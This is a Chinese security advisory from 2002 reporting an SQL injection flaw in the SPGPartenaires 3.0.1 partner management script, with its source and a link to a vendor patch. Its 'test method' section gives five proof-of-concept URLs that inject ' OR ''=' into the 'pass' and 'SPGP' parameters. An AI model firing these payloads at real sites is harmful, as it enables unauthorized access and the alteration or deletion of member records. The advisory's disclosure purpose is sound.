发布日期：2002-12-20
更新日期：2002-12-30

受影响系统：

SPGPartenaires SPGPartenaires 3.0.1

描述：

---

BUGTRAQ  ID: 6455

SPGPartenaires是一款开放源代码合作人管理脚本，可使用在Unix和Linux操作系统下。

SPGPartenaires中多个脚本对用户提交的'pass'和'SPGP' 参数缺少正确检查，远程攻击者可以利用这个漏洞构建恶意URI请求而导致破坏成员信息。

由于脚本没有正确过滤用户提交数据，攻击者通过在'pass'或'SPGP'变量中插入SQL代码，可修改SQL查询逻辑，修改数据库中成员信息，可能也可以利用这个漏洞对数据库进行更高级攻击。

<*来源：Frog Man （leseulfrog@hotmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104040628927673&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Frog Man （leseulfrog@hotmail.com）提供了如下测试方法：

http://www.example.com/modif/ident.php?id=[MEMBERID]&pass='%20OR%20''='
http://www.example.com/modif/delete.php?SPGP=[ID]%7C%7C'%20OR%20''='
http://www.example.com/modif/index2.php?id=[MEMBERID]&pass='%20OR%20''='
http://www.example.com/modif/modif.php?SPGP=[ID]%7C%7C'%20OR%20''='
http://www.example.com/modif/modif_suite.php?SPGP=[ID]%7C%7C'%20OR%20''='

建议：

---

厂商补丁：

SPGPartenaires
--------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

SPGPartenaires SPGPartenaires 3.0.1:

phpsecure Patch SPGpartenaires3.0.1.zip
http://phpsecure.rootzmail.net/SPGpartenaires3.0.1.zip

浏览次数：2758
严重程度：0（网友投票）